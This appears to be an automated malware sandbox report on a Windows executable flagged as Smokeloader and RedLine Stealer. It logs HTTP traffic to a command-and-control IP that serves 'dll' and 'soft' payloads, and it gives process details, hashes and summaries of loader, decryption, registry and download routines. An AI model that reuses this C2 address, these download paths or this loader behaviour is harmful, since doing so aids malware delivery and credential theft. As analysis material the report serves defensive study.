                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:36.503360033 CET | 204 | IN | HTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:36 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Length: 1
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 30
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  5 | 192.168.2.4 | 49808 | 185.156.73.23 | 80 | 2424 | C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Dec 20, 2024 16:23:38.658951998 CET | 395 | OUT | GET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  6           192.168.2.4  49818        185.156.73.23   80                2424  C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                  Dec 20, 2024 16:23:41.462131977 CET  395  OUT  GET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:42.842874050 CET  204  IN  HTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:42 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Length: 1
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 30
                                                                  Data Ascii: 0


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  7           192.168.2.4  49825        185.156.73.23   80                2424  C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                  Dec 20, 2024 16:23:45.098567963 CET  395  OUT  GET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:46.432622910 CET  204  IN  HTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:46 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Length: 1
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 30
                                                                  Data Ascii: 0


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  8           192.168.2.4  49836        185.156.73.23   80                2424  C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                  Dec 20, 2024 16:23:48.598937988 CET  395  OUT  GET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:49.943409920 CET  204  IN  HTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:49 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Length: 1
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 30
                                                                  Data Ascii: 0


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  9           192.168.2.4  49844        185.156.73.23   80                2424  C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                  Dec 20, 2024 16:23:52.113068104 CET  395  OUT  GET /files/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: C
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  10          192.168.2.4  49852        185.156.73.23   80                2424  C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                  Dec 20, 2024 16:23:55.508598089 CET  394  OUT  GET /soft/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: d
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:57.004769087 CET  1236  IN  HTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:56 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Disposition: attachment; filename="dll";
                                                                  Content-Length: 242176
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/octet-stream


                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                  11          192.168.2.4  49858        185.156.73.23   80                2424  C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                  Dec 20, 2024 16:23:58.157550097 CET  394  OUT  GET /soft/download HTTP/1.1
                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                  User-Agent: s
                                                                  Host: 185.156.73.23
                                                                  Connection: Keep-Alive
                                                                  Cache-Control: no-cache
                                                                  Dec 20, 2024 16:23:59.792757034 CET  1236  IN  HTTP/1.1 200 OK
                                                                  Date: Fri, 20 Dec 2024 15:23:59 GMT
                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                  Content-Disposition: attachment; filename="soft";
                                                                  Content-Length: 1502720
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/octet-stream



                                                                  Target ID:0
                                                                  Start time:10:22:23
                                                                  Start date:20/12/2024
                                                                  Path:C:\Users\user\Desktop\zmTSHkabY6.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\zmTSHkabY6.exe"
                                                                  Imagebase:0x400000
                                                                  File size:1'945'088 bytes
                                                                  MD5 hash:CAB7AF24073C5C1C62A2957DD5983C98
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3220928056.0000000000D99000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:7
                                                                  Start time:10:24:03
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2424 -s 1496
                                                                  Imagebase:0x7d0000
                                                                  File size:483'680 bytes
                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true


                                                                    Execution Graph

                                                                    Execution Coverage:2.5%
                                                                    Dynamic/Decrypted Code Coverage:19.3%
                                                                    Signature Coverage:11.9%
                                                                    Total number of Nodes:1081
                                                                    Total number of Limit Nodes:21
37442->37447 37448 4089eb 37442->37448 37444 408a55 37459 401600 27 API calls 2 library calls 37444->37459 37446->37255 37447->37444 37450 4089d0 37447->37450 37455 4089dd __InternalCxxFrameHandler 37448->37455 37457 401600 27 API calls 3 library calls 37448->37457 37449 4089d6 37452 40c26f 25 API calls 37449->37452 37449->37455 37456 401600 27 API calls 3 library calls 37450->37456 37454 408a5f 37452->37454 37455->37255 37456->37449 37457->37455 37459->37449 37460->37266 37461->37268 37462->37266 37463->37277 37467 41144f 37464->37467 37468 411463 37467->37468 37469 411467 37468->37469 37472 4114a1 37468->37472 37485 401ed8 InternetOpenA 37468->37485 37469->37485 37486 40c339 14 API calls __dosmaperr 37469->37486 37471 411491 37487 40c25f 25 API calls __cftof 37471->37487 37488 40c369 37 API calls 2 library calls 37472->37488 37475 4114ad 37476 4114b7 37475->37476 37479 4114ce 37475->37479 37489 417a24 25 API calls 2 library calls 37476->37489 37478 411550 37478->37485 37490 40c339 14 API calls __dosmaperr 37478->37490 37479->37478 37480 4115a5 37479->37480 37480->37485 37492 40c339 14 API calls __dosmaperr 37480->37492 37483 411599 37491 40c25f 25 API calls __cftof 37483->37491 37485->37287 37486->37471 37487->37485 37488->37475 37489->37485 37490->37483 37491->37485 37492->37485 37493->37301 37494->37301 37495->37301 37497 40eeb7 37496->37497 37498 40eec9 37496->37498 37524 409906 GetModuleHandleW 37497->37524 37508 40ed50 37498->37508 37502 40eebc 37502->37498 37525 40ef4f GetModuleHandleExW 37502->37525 37503 4096cf 37503->36749 37507 40ef0c 37509 40ed5c __FrameHandler3::FrameUnwindToState 37508->37509 37531 40f28c RtlEnterCriticalSection 37509->37531 37511 40ed66 37532 40edbc 37511->37532 37513 40ed73 37536 40ed91 37513->37536 37516 40ef0d 37541 41366f GetPEB 37516->37541 37519 40ef3c 37522 40ef4f __FrameHandler3::FrameUnwindToState 3 API calls 37519->37522 37520 40ef1c GetPEB 37520->37519 37521 40ef2c GetCurrentProcess TerminateProcess 37520->37521 
37521->37519 37523 40ef44 ExitProcess 37522->37523 37524->37502 37526 40ef91 37525->37526 37527 40ef6e GetProcAddress 37525->37527 37528 40eec8 37526->37528 37529 40ef97 FreeLibrary 37526->37529 37530 40ef83 37527->37530 37528->37498 37529->37528 37530->37526 37531->37511 37533 40edc8 __FrameHandler3::FrameUnwindToState 37532->37533 37535 40ee29 __FrameHandler3::FrameUnwindToState 37533->37535 37539 410940 14 API calls __FrameHandler3::FrameUnwindToState 37533->37539 37535->37513 37540 40f2d4 RtlLeaveCriticalSection 37536->37540 37538 40ed7f 37538->37503 37538->37516 37539->37535 37540->37538 37542 413689 37541->37542 37544 40ef17 37541->37544 37545 411c94 5 API calls _unexpected 37542->37545 37544->37519 37544->37520 37545->37544 36570 100079ee 36571 10007a2c 36570->36571 36575 100079fc _unexpected 36570->36575 36578 10005926 12 API calls __dosmaperr 36571->36578 36573 10007a17 RtlAllocateHeap 36574 10007a2a 36573->36574 36573->36575 36575->36571 36575->36573 36577 10005aed EnterCriticalSection LeaveCriticalSection _unexpected 36575->36577 36577->36575 36578->36574 37546 d99c06 37547 d99c15 37546->37547 37550 d9a3a6 37547->37550 37552 d9a3c1 37550->37552 37551 d9a3ca CreateToolhelp32Snapshot 37551->37552 37553 d9a3e6 Module32First 37551->37553 37552->37551 37552->37553 37554 d99c1e 37553->37554 37555 d9a3f5 37553->37555 37557 d9a065 37555->37557 37558 d9a090 37557->37558 37559 d9a0a1 VirtualAlloc 37558->37559 37560 d9a0d9 37558->37560 37559->37560

                                                                    Control-flow Graph

                                                                    • Function at 402c70 (graph image not preserved; legend: Executed / Not Executed)
                                                                    APIs
                                                                    • SetLastError.KERNEL32(0000000D), ref: 00402C96
                                                                    • SetLastError.KERNEL32(000000C1), ref: 00402CD8
                                                                    Strings
                                                                    • @, xrefs: 00402C8F
                                                                    • DOS header is not valid!, xrefs: 00402CC6
                                                                    • ERROR_OUTOFMEMORY!, xrefs: 00402DEF
                                                                    • DOS header size is not valid!, xrefs: 00402D09
                                                                    • Size is not valid!, xrefs: 00402C9C
                                                                    • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402D4A
                                                                    • alignedImageSize != AlignValueUp!, xrefs: 00402DB9
                                                                    • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402D38
                                                                    • Section alignment invalid!, xrefs: 00402D5C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID: @$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                                                                    • API String ID: 1452528299-393758929
                                                                    • Opcode ID: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
                                                                    • Instruction ID: 68209fb506ae9b68e90255ee0055c9910cae7d9580854ddc7816d62818b51dcc
                                                                    • Opcode Fuzzy Hash: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
                                                                    • Instruction Fuzzy Hash: 3E129C71B002159BDB14CF98D985BAEBBB5BF48304F14416AE809BB3C1D7B8ED41CB98

                                                                    Control-flow Graph

                                                                    • Function at 4034c0 (graph image not preserved; legend: Executed / Not Executed)
                                                                    APIs
                                                                    • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,6C8BF0E5), ref: 00403540
                                                                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403564
                                                                    • _mbstowcs.LIBCMT ref: 004035B7
                                                                    • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004035CE
                                                                    • GetLastError.KERNEL32 ref: 004035D8
                                                                    • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403600
                                                                    • GetLastError.KERNEL32 ref: 0040360A
                                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040361A
                                                                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004036DC
                                                                    • CryptDestroyKey.ADVAPI32(?), ref: 0040374E
                                                                    Strings
                                                                    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040351C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
                                                                    • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                                    • API String ID: 3642901890-63410773
                                                                    • Opcode ID: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
                                                                    • Instruction ID: 057eae88fc1e8b42dc2b0b13f8460ebd140b44a30a8541124d595f3772e2d34e
                                                                    • Opcode Fuzzy Hash: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
                                                                    • Instruction Fuzzy Hash: 4D8182B1A00218AFEF248F25CC45B9ABBB9EF45304F1081BAE50DE7291DB359E858F55

                                                                    Control-flow Graph

                                                                    • Function at 402950 (graph image not preserved; legend: Executed / Not Executed)
                                                                    APIs
                                                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 004029F8
                                                                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402A0D
                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402A1B
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402A36
                                                                    • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402A55
                                                                    • LocalFree.KERNEL32(00000000), ref: 00402A62
                                                                    • LocalFree.KERNEL32(?), ref: 00402A67
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                                                    • String ID: %s: %s$Error protecting memory page
                                                                    • API String ID: 839691724-1484484497
                                                                    • Opcode ID: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
                                                                    • Instruction ID: 2da31f80489fd9465a3e1d2b594a5759e7c0520832ca97f04c55df17c8a78757
                                                                    • Opcode Fuzzy Hash: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
                                                                    • Instruction Fuzzy Hash: 0831F272B00114AFDB14DF58DC44FAAB7A8FF48304F0541AAE905EB291DA75AD12CA88

                                                                    Control-flow Graph

                                                                    • Function at 401880 (graph image not preserved; legend: Executed / Not Executed)
                                                                    APIs
                                                                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401905
                                                                    • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401924
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: FileInternet$PointerRead
                                                                    • String ID: text
                                                                    • API String ID: 3197321146-999008199
                                                                    • Opcode ID: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
                                                                    • Instruction ID: 86dcce6fdabdf1d76a3839b2d4c7acaf7fb3a9f1032210a7d38a4a94718e3fd4
                                                                    • Opcode Fuzzy Hash: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
                                                                    • Instruction Fuzzy Hash: 7AC16B71A002189FEB25CF24CD85BEAB7B9FF48304F1041ADE509A76A1DB75AE84CF54

                                                                    Control-flow Graph

                                                                    • Function at 40ef0d (graph image not preserved; legend: Executed / Not Executed)
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,?,0040EF0C,00000000,74DEDF80,?,00000000,?,004114AD), ref: 0040EF2F
                                                                    • TerminateProcess.KERNEL32(00000000,?,0040EF0C,00000000,74DEDF80,?,00000000,?,004114AD), ref: 0040EF36
                                                                    • ExitProcess.KERNEL32 ref: 0040EF48
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                                    • Instruction ID: d9b2d8b9480fbdfc0f40d30fbcce2ac7d268d3ffe56ae59340c1a79faed9bf6b
                                                                    • Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                                    • Instruction Fuzzy Hash: 48E08C71400108BFCF117F26CC0898A3F28FB10341B004835F804AA232CB39DD92CB58

                                                                    Control-flow Graph

                                                                    • Function at d9a3a6 (graph image not preserved; legend: Executed / Not Executed)
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00D9A3CE
                                                                    • Module32First.KERNEL32(00000000,00000224), ref: 00D9A3EE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220928056.0000000000D99000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D99000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d99000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 3833638111-0
                                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                    • Instruction ID: 4395985c93f9b57827087ff6b9d5851abf6baa9e176a56992a48302be1502829
                                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                    • Instruction Fuzzy Hash: 28F062326007116FDB203AFD9C8DA6E76E8EF49725F144528E646910C0DB70EC4546B2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: emp$mixtwo
                                                                    • API String ID: 3472027048-2390925073
                                                                    • Opcode ID: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
                                                                    • Instruction ID: 72a2dd17e89226f8ccca0b0bb08db3f26db736a0bfe45ababc36bb360cb4900e
                                                                    • Opcode Fuzzy Hash: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
                                                                    • Instruction Fuzzy Hash: 7BF08CB160130457E710BF24ED1B71A3EA4970275CFA006ADDC601F2D2E7FB821A97EA

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNEL32(000005DC,?,756CD120), ref: 00405620
                                                                    • __Init_thread_footer.LIBCMT ref: 00405847
                                                                    • Sleep.KERNEL32(00000BB8,00000000,?,0042B77C,0042B92C,0042B92D,?,?,?,?,?,?,?,00000001,SUB=,00000004), ref: 00405A4A
                                                                      • Part of subcall function 00406550: __Init_thread_footer.LIBCMT ref: 004065B9
                                                                      • Part of subcall function 004065E0: __Init_thread_footer.LIBCMT ref: 0040663A
                                                                      • Part of subcall function 00407C30: __Init_thread_footer.LIBCMT ref: 00407C99
                                                                      • Part of subcall function 00407BB0: __Init_thread_footer.LIBCMT ref: 00407C09
                                                                      • Part of subcall function 00407B10: __Init_thread_footer.LIBCMT ref: 00407B8D
                                                                    • Sleep.KERNEL32(00000BB8,00000000,?,?,?,?,?,004272E8,00000000,00000000,?,00000000,00000001,SUB=,00000004), ref: 004062DE
                                                                    • Sleep.KERNEL32(00000BB8,00000000,00000000,004272E8), ref: 004063DD
                                                                      • Part of subcall function 00407FA0: __Init_thread_footer.LIBCMT ref: 00407FF9
                                                                      • Part of subcall function 00407F20: __Init_thread_footer.LIBCMT ref: 00407F79
                                                                      • Part of subcall function 00407EC0: __Init_thread_footer.LIBCMT ref: 00407F11
                                                                      • Part of subcall function 004055C0: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405493
                                                                      • Part of subcall function 004055C0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 004054B5
                                                                      • Part of subcall function 004055C0: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 004054DD
                                                                      • Part of subcall function 004055C0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054E6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Init_thread_footer$Sleep$CloseCreateOpenValue
                                                                    • String ID: DFEK$KDOX$Q)9$SUB=$]DFE$^OX*$get$mixone$updateSW$viFO
                                                                    • API String ID: 2078494684-1136066708
                                                                    • Opcode ID: 3370340bea71cbf09f401ea1be89ae1aa616e8b686eb8a3d9626f30ac681365a
                                                                    • Instruction ID: f649a411d8851b1a91c0a488fce11130e3673d7bad0c40fe0d5f826dd2b8960c
                                                                    • Opcode Fuzzy Hash: 3370340bea71cbf09f401ea1be89ae1aa616e8b686eb8a3d9626f30ac681365a
                                                                    • Instruction Fuzzy Hash: 3F82AF71D001049ADB14FBB5C95ABEEB3789F14308F5081BEF412771D2EF786A49CAA9

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                                                    • __cftof.LIBCMT ref: 10001624
                                                                    • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                                                    • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                                                    • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                                                    • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                                                    • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                                                    • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                                                    • String ID: GET$http://
                                                                    • API String ID: 1233269984-1632879366
                                                                    • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                                    • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                                                    • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
